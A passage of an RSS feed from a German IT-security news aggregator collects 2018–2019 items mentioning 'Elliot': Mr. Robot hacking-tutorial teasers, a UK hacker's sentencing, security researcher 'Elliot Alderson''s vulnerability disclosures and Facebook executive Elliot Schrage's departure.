<content:encoded><![CDATA[Welcome back, my rookie hackers!In Season 1 Episode 6 Elliot is being blackmailed by the ruthless and unrelenting drug dealer, Vera, to hack him out of jail. He is holding Elliot's new love interest, Shayla, hostage and has given Elliot until midnight to hack the jail's computer system in order to release him.Elliot tries to explain to Vera that such a hack can't be done in a matter of hours, but rather days or weeks to find a security vulnerability that he can exploit. Vera, being the vicious<img src="http://static.wixstatic.com/media/6a4a49_e3b82b0cb12646749ae58ec8c1c970ba~mv2.jpg/v1/fill/w_568%2Ch_327/6a4a49_e3b82b0cb12646749ae58ec8c1c970ba~mv2.jpg">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot Hacks, Part 7: How Elliot Hacks Everyone's Password]]></title>
<description><![CDATA[Welcome back, my Mr. Robot fans!In the television show, Mr. Robot on FX (past episodes are on Amazon Prime), Elliot seems to be able to hack anyone's password. For anyone who has attempted to crack a password, you know it isn't exactly that easy. Brute forcing long and complex passwords can be ti...]]></description>
<link>https://tsecurity.de/de/839413/it-security-nachrichten/mr-robot-hacks-part-7-how-elliot-hacks-everyones-password/</link>
<guid isPermaLink="true">https://tsecurity.de/de/839413/it-security-nachrichten/mr-robot-hacks-part-7-how-elliot-hacks-everyones-password/</guid>
<pubDate>Wed, 28 Aug 2019 07:32:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Welcome back, my Mr. Robot fans!In the television show, Mr. Robot on FX (past episodes are on Amazon Prime), Elliot seems to be able to hack anyone's password. For anyone who has attempted to crack a password, you know it isn't exactly that easy. Brute forcing long and complex passwords can be time-consuming and tedious without a GPU farm or a botnet. While cracking dictionary words is easy and can be done in minutes, fewer and fewer accounts have dictionary word-based passwords. Users are now<img src="http://static.wixstatic.com/media/6a4a49_b64deda3b8944a8cbc1fcb68ca4c9a2d~mv2.png">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Teenage Hacker Sentenced to 20 Months in Prison for Selling Personal Data & Offer Freelance Hacking Services]]></title>
<description><![CDATA[A 19-year-old British teenager, Elliot Gunton sentenced to 20 months for his role in supplying personal data online and offering freelance hacking services. He was sentenced at Norwich Crown Court last Friday for committing cybercrimes that include breaching Sexual Harm Prevention Order, supplyin...]]></description>
<link>https://tsecurity.de/de/584607/hacking/teenage-hacker-sentenced-to-20-months-in-prison-for-selling-personal-data-offer-freelance-hacking-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/584607/hacking/teenage-hacker-sentenced-to-20-months-in-prison-for-selling-personal-data-offer-freelance-hacking-services/</guid>
<pubDate>Tue, 20 Aug 2019 08:30:41 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img width="300" height="300" src="https://i2.wp.com/1.bp.blogspot.com/-t5R1x8XuF-w/XVsowOGNwHI/AAAAAAAADs4/CvtK1Uefq6UAjP4UzKXeTmxehiwNkLZ3QCLcBGAs/s1600/Teenage.png?fit=300%2C300&amp;ssl=1" class="webfeedsFeaturedVisual wp-post-image" alt="Teenage Hacker Sentenced to 20 Months in Prison for Selling Personal Data" link_thumbnail=""><p>A 19-year-old British teenager, Elliot Gunton sentenced to 20 months for his role in supplying personal data online and offering freelance hacking services. He was sentenced at Norwich Crown Court last Friday for committing cybercrimes that include breaching Sexual Harm Prevention Order, supplying personal data online, advertising compromised data and hacking theft services. In April […]</p>
<p>The post <a rel="nofollow" href="https://gbhackers.com/teenage-hacker-sentenced-to-20-months-in-prison-for-selling-personal-data-offer-freelance-hacking-services/">Teenage Hacker Sentenced to 20 Months in Prison for Selling Personal Data &amp; Offer Freelance Hacking Services</a> appeared first on <a rel="nofollow" href="https://gbhackers.com/">GBHackers On Security</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[UK Hacker Sentenced to 20 Months in Prison]]></title>
<description><![CDATA[Hacker Elliot Gunton has been sentenced to 20 months in prison by Norwich (UK) County Court, but released immediately because of time already served in custody.
read more]]></description>
<link>https://tsecurity.de/de/583922/it-security-nachrichten/uk-hacker-sentenced-to-20-months-in-prison/</link>
<guid isPermaLink="true">https://tsecurity.de/de/583922/it-security-nachrichten/uk-hacker-sentenced-to-20-months-in-prison/</guid>
<pubDate>Mon, 19 Aug 2019 16:01:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p><span><span><strong>Hacker Elliot Gunton has been sentenced to 20 months in prison by Norwich (UK) County Court, but released immediately because of time already served in custody.</strong></span></span></p>
<p><a href="https://www.securityweek.com/uk-hacker-sentenced-20-months-prison" target="_blank">read more</a></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=yIl2AUoC8zA" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:-BTjWOF_DHI"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=ezAAemVzm_c:tt_IR7YXGOk:-BTjWOF_DHI" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:dnMXMwOfBR0"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=dnMXMwOfBR0" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=ezAAemVzm_c:tt_IR7YXGOk:V_sGLiPBpWU" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=qj6IDK7rITs" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=ezAAemVzm_c:tt_IR7YXGOk:gIN9vFwOqvQ" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:TzevzKxY174"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=TzevzKxY174" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=ezAAemVzm_c:tt_IR7YXGOk:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=ezAAemVzm_c:tt_IR7YXGOk:F7zBnMyn0Lo" border="0"></a>
</div>
<img src="http://feeds.feedburner.com/~r/Securityweek/~4/ezAAemVzm_c" height="1" width="1" alt="">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix - Letzte Chance: Diese Serien und Filme verschwinden bald]]></title>
<description><![CDATA[Im August 2019 trennt sich Netflix wieder von zahlreichen Filmen und Serien. Dazu gehören beispielsweise alle Staffeln von "Party of Five" und der Film "Billy Elliot - I will Dance". Welche Titel noch im August 2019 von der Streaming-Plattform verschwinden, erfahrt ihr in unserer Übersicht.
					...]]></description>
<link>https://tsecurity.de/de/576737/it-nachrichten/netflix-letzte-chance-diese-serien-und-filme-verschwinden-bald/</link>
<guid isPermaLink="true">https://tsecurity.de/de/576737/it-nachrichten/netflix-letzte-chance-diese-serien-und-filme-verschwinden-bald/</guid>
<pubDate>Fri, 09 Aug 2019 19:38:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Im August 2019 trennt sich Netflix wieder von zahlreichen Filmen und Serien. Dazu gehören beispielsweise alle Staffeln von "Party of Five" und der Film "Billy Elliot - I will Dance". Welche Titel noch im August 2019 von der Streaming-Plattform verschwinden, erfahrt ihr in unserer Übersicht.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/videos/filme-streamen/index.html">Video-Streaming &amp; Filme streamen</a>,																	<a href="https://www.netzwelt.de/netflix/index.html">Netflix</a>,																	<a href="https://www.netzwelt.de/video-streaming/index.html">Video-Streaming-Dienste</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=pgIkBc8ztRs:y6BiyaMx5yM:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div>
<img src="http://feeds.feedburner.com/~r/netzwelt/~4/pgIkBc8ztRs" height="1" width="1" alt="">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Ethical Hacker "Elliot Alderson" on misinformation and software security]]></title>
<description><![CDATA[submitted by    /u/pastel01  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/571895/it-security-nachrichten/ethical-hacker-elliot-alderson-on-misinformation-and-software-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/571895/it-security-nachrichten/ethical-hacker-elliot-alderson-on-misinformation-and-software-security/</guid>
<pubDate>Thu, 08 Aug 2019 10:31:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table><tr>
<td> <a href="https://www.reddit.com/r/security/comments/cniri6/ethical_hacker_elliot_alderson_on_misinformation/"> <img src="https://b.thumbs.redditmedia.com/uiRH_azIsEA6BT5lemXwh2GELutW9sD6ZuxCZLPlHDM.jpg" alt='Ethical Hacker "Elliot Alderson" on misinformation and software security' title='Ethical Hacker "Elliot Alderson" on misinformation and software security'></a> </td>
<td>   submitted by   <a href="https://www.reddit.com/user/pastel01"> /u/pastel01 </a> <br><span><a href="https://soundcloud.com/packt-podcasts/cybersecurity-researcher-elliot-alderson-on-fighting-the-good-fight-online">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/cniri6/ethical_hacker_elliot_alderson_on_misinformation/">[comments]</a></span> </td>
</tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[LPG Gas Company Leaked Details, Aadhaar Numbers of 6.7 Million Indian Customers]]></title>
<description><![CDATA[Why would someone bother to hack a so-called "ultra-secure encrypted database that is being protected behind 13 feet high and 5 feet thick walls," when one can simply fetch a copy of the same data from other sources.

French security researcher Baptiste Robert, who goes by the pseudonym "Elliot A...]]></description>
<link>https://tsecurity.de/de/458446/it-security-nachrichten/lpg-gas-company-leaked-details-aadhaar-numbers-of-67-million-indian-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/458446/it-security-nachrichten/lpg-gas-company-leaked-details-aadhaar-numbers-of-67-million-indian-customers/</guid>
<pubDate>Tue, 19 Feb 2019 11:01:30 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Why would someone bother to hack a so-called "ultra-secure encrypted database that is being protected behind 13 feet high and 5 feet thick walls," when one can simply fetch a copy of the same data from other sources.

French security researcher Baptiste Robert, who goes by the pseudonym "Elliot Alderson" on Twitter, with the help of an Indian researcher, who wants to remain anonymous,<img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/TNc_TT1-wcs" height="1" width="1" alt="">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Android ES File Explorer Vulnerability Exposes All User Data To Attackers On The Same Network]]></title>
<description><![CDATA[A serious vulnerability in a popular Android file has been discovered and exposes all the user’s data to attackers on the same network. In essence, the victim would only need to open the app once. This bug was found by researching Elliot Alderson, who posted about it on Twitter. Expert Comments b...]]></description>
<link>https://tsecurity.de/de/447636/it-security-nachrichten/android-es-file-explorer-vulnerability-exposes-all-user-data-to-attackers-on-the-same-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/447636/it-security-nachrichten/android-es-file-explorer-vulnerability-exposes-all-user-data-to-attackers-on-the-same-network/</guid>
<pubDate>Mon, 21 Jan 2019 15:31:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>A serious vulnerability in a popular Android file has been discovered and exposes all the user’s data to attackers on the same network. In essence, the victim would only need to open the app once. This bug was found by researching Elliot Alderson, who posted about it on Twitter. Expert Comments below: Craig Young, Security Researcher at Tripwire: …</p>
<p>The ISBuzz Post: This Post <a rel="nofollow" href="https://www.informationsecuritybuzz.com/expert-comments/android-es-file-explorer-vulnerability/">Android ES File Explorer Vulnerability Exposes All User Data To Attackers On The Same Network</a> appeared first on <a rel="nofollow" href="https://www.informationsecuritybuzz.com/">Information Security Buzz</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Android ES File Explorer Vulnerability Exposes All User Data To Attackers On The Same Network]]></title>
<description><![CDATA[A serious vulnerability in a popular Android file has been discovered and exposes all the user’s data to attackers on the same network. In essence, the victim would only need to open the app once. This bug was found by researching Elliot Alderson, who posted about it on Twitter. Expert Comments b...]]></description>
<link>https://tsecurity.de/de/447637/it-security-nachrichten/android-es-file-explorer-vulnerability-exposes-all-user-data-to-attackers-on-the-same-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/447637/it-security-nachrichten/android-es-file-explorer-vulnerability-exposes-all-user-data-to-attackers-on-the-same-network/</guid>
<pubDate>Mon, 21 Jan 2019 15:31:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>A serious vulnerability in a popular Android file has been discovered and exposes all the user’s data to attackers on the same network. In essence, the victim would only need to open the app once. This bug was found by researching Elliot Alderson, who posted about it on Twitter. Expert Comments below: Craig Young, Security Researcher at Tripwire: …</p>
<p>The ISBuzz Post: This Post <a rel="nofollow" href="https://www.informationsecuritybuzz.com/expert-comments/android-es-file-explorer-vulnerability/">Android ES File Explorer Vulnerability Exposes All User Data To Attackers On The Same Network</a> appeared first on <a rel="nofollow" href="https://www.informationsecuritybuzz.com/">Information Security Buzz</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[ES File Explorer Vulnerabilities Puts 100 Million Users Data at Risk]]></title>
<description><![CDATA[The ES File Explorer is the most popular android file manager that has more than 500 million users worldwide according to the app developer. The app available on Google play since 2014, it help’s in managing your Android phone and tablet. French security researcher who goes online with online han...]]></description>
<link>https://tsecurity.de/de/447312/hacking/es-file-explorer-vulnerabilities-puts-100-million-users-data-at-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/447312/hacking/es-file-explorer-vulnerabilities-puts-100-million-users-data-at-risk/</guid>
<pubDate>Sun, 20 Jan 2019 03:15:42 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img width="300" height="157" src="https://i1.wp.com/gbhackers.com/wp-content/uploads/2019/01/ES-File-Explorer.png?fit=300%2C157&amp;ssl=1" class="webfeedsFeaturedVisual wp-post-image" alt="ES File Explorer" srcset="https://i1.wp.com/gbhackers.com/wp-content/uploads/2019/01/ES-File-Explorer.png?w=728&amp;ssl=1 728w, https://i1.wp.com/gbhackers.com/wp-content/uploads/2019/01/ES-File-Explorer.png?resize=300%2C157&amp;ssl=1 300w, https://i1.wp.com/gbhackers.com/wp-content/uploads/2019/01/ES-File-Explorer.png?resize=700%2C365&amp;ssl=1 700w, https://i1.wp.com/gbhackers.com/wp-content/uploads/2019/01/ES-File-Explorer.png?resize=696%2C363&amp;ssl=1 696w" sizes="(max-width: 300px) 100vw, 300px"><p>The ES File Explorer is the most popular android file manager that has more than 500 million users worldwide according to the app developer. The app available on Google play since 2014, it help’s in managing your Android phone and tablet. French security researcher who goes online with online handle Elliot Alderson discovered a vulnerability […]</p>
<p>The post <a rel="nofollow" href="https://gbhackers.com/es-file-explorer-vulnerability/">ES File Explorer Vulnerabilities Puts 100 Million Users Data at Risk</a> appeared first on <a rel="nofollow" href="https://gbhackers.com/">GBHackers On Security</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Merry Christmas, an Inspired Creation]]></title>
<description><![CDATA[Inspired by u/subins2000's post, I made my own version of a Christmas greeting! Check it out here! Let me know what you think! 
   submitted by    /u/igglyplop  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/435937/linux-tipps/merry-christmas-an-inspired-creation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/435937/linux-tipps/merry-christmas-an-inspired-creation/</guid>
<pubDate>Tue, 25 Dec 2018 20:15:18 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>Inspired by <a href="https://www.reddit.com/u/subins2000">u/subins2000</a>'s <a href="https://www.reddit.com/r/linux/comments/a96p59/the_linux_way_of_wishing_christmas/">post</a>, I made my own version of a Christmas greeting! Check it out <a href="https://github.com/elliot-wasem/ChristmasTree">here</a>! Let me know what you think!</p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/igglyplop"> /u/igglyplop </a> <br><span><a href="https://www.reddit.com/r/linux/comments/a9gtxa/merry_christmas_an_inspired_creation/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/a9gtxa/merry_christmas_an_inspired_creation/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot Hacks, Season 3 E.9: How Elliot Traces the Dark Army]]></title>
<description><![CDATA[As Mr Robot races to the conclusion of Season 3, Elliot is determined to stop the Dark Army from doing any more damage. The Dark Army, led by White Rose, has blown up 71 buildings. As you remember, Elliot's system has been compromised and he wants to trace the malware back to its source and hack ...]]></description>
<link>https://tsecurity.de/de/424422/it-security-nachrichten/mr-robot-hacks-season-3-e9-how-elliot-traces-the-dark-army/</link>
<guid isPermaLink="true">https://tsecurity.de/de/424422/it-security-nachrichten/mr-robot-hacks-season-3-e9-how-elliot-traces-the-dark-army/</guid>
<pubDate>Sun, 09 Dec 2018 22:22:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As Mr Robot races to the conclusion of Season 3, Elliot is determined to stop the Dark Army from doing any more damage. The Dark Army, led by White Rose, has blown up 71 buildings. As you remember, Elliot's system has been compromised and he wants to trace the malware back to its source and hack the Dark Army to gain control of their operations.Elliot uses memory forensics tools to reverse engineer the Dark Army's malware and send a malicious document to their command and control server to take<img src="http://static.wixstatic.com/media/6a4a49_58dac2b43c8c49a4b740f5a91c4f06e5~mv2.jpg">
]]></content:encoded>
</item>
<item>
<title><![CDATA[After Initially Calling The New York Times' Report False, Facebook Confirms Most Claims Made in the Story]]></title>
<description><![CDATA[Nellie Bowles and Zach Wichter, reporting for The New York Times: Joining a long tradition of companies and campaigns that drop bad news on holidays, Facebook on Thanksgiving eve took responsibility for hiring a Washington-based lobbying company, Definers Public Affairs, that pushed negative stor...]]></description>
<link>https://tsecurity.de/de/412793/it-security-nachrichten/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story/</link>
<guid isPermaLink="true">https://tsecurity.de/de/412793/it-security-nachrichten/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story/</guid>
<pubDate>Fri, 23 Nov 2018 23:31:10 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nellie Bowles and Zach Wichter, reporting for The New York Times: Joining a long tradition of companies and campaigns that drop bad news on holidays, Facebook on Thanksgiving eve took responsibility for hiring a Washington-based lobbying company, Definers Public Affairs, that pushed negative stories about Facebook's critics, including the philanthropist George Soros. Facebook's communications and policy chief, Elliot Schrage, said in a memo posted Wednesday that he was responsible for hiring the group, and had done so to help protect the company's image and conduct research about high-profile individuals who spoke critically about the social media platform. Mr. Schrage will be leaving the company, a move planned before the memo was released. 

Facebook fired Definers last week, after a New York Times investigation published on Nov. 14. "Did we ask them to do work on George Soros?" Mr. Schrage wrote in the memo, a draft of which had circulated online earlier in the week. "Yes." He added: "I'm sorry I let you all down. I regret my own failure here." This is a change from just a few days ago, when Facebook wrote on Nov. 15 that the Times report was full of "inaccuracies." The same day, Sheryl Sandberg, the company's chief operating officer, posted on her Facebook page that she had no idea the company had hired Definers.<p></p>
<div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=After+Initially+Calling+The+New+York+Times'+Report+False%2C+Facebook+Confirms+Most+Claims+Made+in+the+Story%3A+http%3A%2F%2Fbit.ly%2F2FF1Q7t"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F18%2F11%2F23%2F2159245%2Fafter-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://tech.slashdot.org/story/18/11/23/2159245/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div>
<p><a href="https://tech.slashdot.org/story/18/11/23/2159245/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[After Initially Calling The New York Times' Report False, Facebook Confirms Most Claims Made in the Story]]></title>
<description><![CDATA[Nellie Bowles and Zach Wichter, reporting for The New York Times: Joining a long tradition of companies and campaigns that drop bad news on holidays, Facebook on Thanksgiving eve took responsibility for hiring a Washington-based lobbying company, Definers Public Affairs, that pushed negative stor...]]></description>
<link>https://tsecurity.de/de/412794/it-security-nachrichten/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story/</link>
<guid isPermaLink="true">https://tsecurity.de/de/412794/it-security-nachrichten/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story/</guid>
<pubDate>Fri, 23 Nov 2018 23:31:10 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nellie Bowles and Zach Wichter, reporting for The New York Times: Joining a long tradition of companies and campaigns that drop bad news on holidays, Facebook on Thanksgiving eve took responsibility for hiring a Washington-based lobbying company, Definers Public Affairs, that pushed negative stories about Facebook's critics, including the philanthropist George Soros. Facebook's communications and policy chief, Elliot Schrage, said in a memo posted Wednesday that he was responsible for hiring the group, and had done so to help protect the company's image and conduct research about high-profile individuals who spoke critically about the social media platform. Mr. Schrage will be leaving the company, a move planned before the memo was released. 

Facebook fired Definers last week, after a New York Times investigation published on Nov. 14. "Did we ask them to do work on George Soros?" Mr. Schrage wrote in the memo, a draft of which had circulated online earlier in the week. "Yes." He added: "I'm sorry I let you all down. I regret my own failure here." This is a change from just a few days ago, when Facebook wrote on Nov. 15 that the Times report was full of "inaccuracies." The same day, Sheryl Sandberg, the company's chief operating officer, posted on her Facebook page that she had no idea the company had hired Definers.<p></p>
<div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=After+Initially+Calling+The+New+York+Times'+Report+False%2C+Facebook+Confirms+Most+Claims+Made+in+the+Story%3A+http%3A%2F%2Fbit.ly%2F2FF1Q7t"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F18%2F11%2F23%2F2159245%2Fafter-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://tech.slashdot.org/story/18/11/23/2159245/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div>
<p><a href="https://tech.slashdot.org/story/18/11/23/2159245/after-initially-calling-the-new-york-times-report-false-facebook-confirms-most-claims-made-in-the-story?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Dating App for Trump Supporters Exposed Members’ Information]]></title>
<description><![CDATA[A dating app geared towards connecting supporters of U.S. President Donald Trump exposed members’ personal and account information. On 15 October, security researcher Baptiste Robert (who also goes by the name “Elliot Alderson”) discovered security weaknesses in the Donald Daters dating app that ...]]></description>
<link>https://tsecurity.de/de/390426/it-security-nachrichten/dating-app-for-trump-supporters-exposed-members-information/</link>
<guid isPermaLink="true">https://tsecurity.de/de/390426/it-security-nachrichten/dating-app-for-trump-supporters-exposed-members-information/</guid>
<pubDate>Tue, 16 Oct 2018 13:16:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>A dating app geared towards connecting supporters of U.S. President Donald Trump exposed members’ personal and account information. On 15 October, security researcher Baptiste Robert (who also goes by the name “Elliot Alderson”) discovered security weaknesses in the Donald Daters dating app that exposed several pieces of users’ information. Hi @FoxNews and @realDonaldTrump supporters, You […]… <a class="view-article " href="https://www.tripwire.com/state-of-security/security-data-protection/dating-app-for-trump-supporters-exposed-members-information/" title="Read More">Read More</a></p>
<p>The post <a rel="nofollow" href="https://www.tripwire.com/state-of-security/security-data-protection/dating-app-for-trump-supporters-exposed-members-information/">Dating App for Trump Supporters Exposed Members’ Information</a> appeared first on <a rel="nofollow" href="https://www.tripwire.com/state-of-security">The State of Security</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot: Serienende mit Staffel 4]]></title>
<description><![CDATA[Elliot Alderson hängt die Tastatur an den Nagel - Mr. Robot wird nach dem Ende der 4. Staffel eingestellt. Außerdem soll die finale Staffel angeblich mehr Episoden bekommen, als gedacht. Wir verraten euch, was Serienschöpfer Sam Esmail zur Einstellung der Serie gesagt hat.
																					Di...]]></description>
<link>https://tsecurity.de/de/364498/it-nachrichten/mr-robot-serienende-mit-staffel-4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/364498/it-nachrichten/mr-robot-serienende-mit-staffel-4/</guid>
<pubDate>Thu, 30 Aug 2018 10:35:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Alderson hängt die Tastatur an den Nagel - Mr. Robot wird nach dem Ende der 4. Staffel eingestellt. Außerdem soll die finale Staffel angeblich mehr Episoden bekommen, als gedacht. Wir verraten euch, was Serienschöpfer Sam Esmail zur Einstellung der Serie gesagt hat.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/video/tv-serie.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/rtl-nitro.html">RTL NITRO</a>,																	<a href="https://www.netzwelt.de/tv-sender/rtl-crime.html">RTL Crime</a>,																	<a href="https://www.netzwelt.de/serien/mr-robot/index.html">Mr. Robot (TV-Serie)</a>,																	<a href="https://www.netzwelt.de/tv-sender/usa-network.html">USA Network</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=wSI2X76S0YY:MHmy13YxS7s:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div>
<img src="http://feeds.feedburner.com/~r/netzwelt/~4/wSI2X76S0YY" height="1" width="1" alt="">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Facebook verliert Elliot Schrage als Kommunikationschef]]></title>
<description><![CDATA[Facebooks Kommunikationschef Elliot Schrage hat seinen Rücktritt bei dem von einem Datenskandal erschütterten Online-Netzwerk eingereicht.]]></description>
<link>https://tsecurity.de/de/328893/it-nachrichten/facebook-verliert-elliot-schrage-als-kommunikationschef/</link>
<guid isPermaLink="true">https://tsecurity.de/de/328893/it-nachrichten/facebook-verliert-elliot-schrage-als-kommunikationschef/</guid>
<pubDate>Mon, 18 Jun 2018 10:33:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Facebooks Kommunikationschef Elliot Schrage hat seinen Rücktritt bei dem von einem Datenskandal erschütterten Online-Netzwerk eingereicht.]]></content:encoded>
</item>
<item>
<title><![CDATA[Facebook: Kommunikationschef Elliot Schrage tritt zurück]]></title>
<description><![CDATA[Krise bei Facebook und der Kommunikationschef Elliot Schrage verlässt das Schiff – fast jedenfalls, denn er will dem Unternehmen als Berater treu bleiben.]]></description>
<link>https://tsecurity.de/de/327937/it-nachrichten/facebook-kommunikationschef-elliot-schrage-tritt-zurueck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/327937/it-nachrichten/facebook-kommunikationschef-elliot-schrage-tritt-zurueck/</guid>
<pubDate>Fri, 15 Jun 2018 08:47:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Krise bei Facebook und der Kommunikationschef Elliot Schrage verlässt das Schiff – fast jedenfalls, denn er will dem Unternehmen als Berater treu bleiben.]]></content:encoded>
</item>
<item>
<title><![CDATA[Facebook Exec Admits 'No Real Understanding' for the Scope of Fake News]]></title>
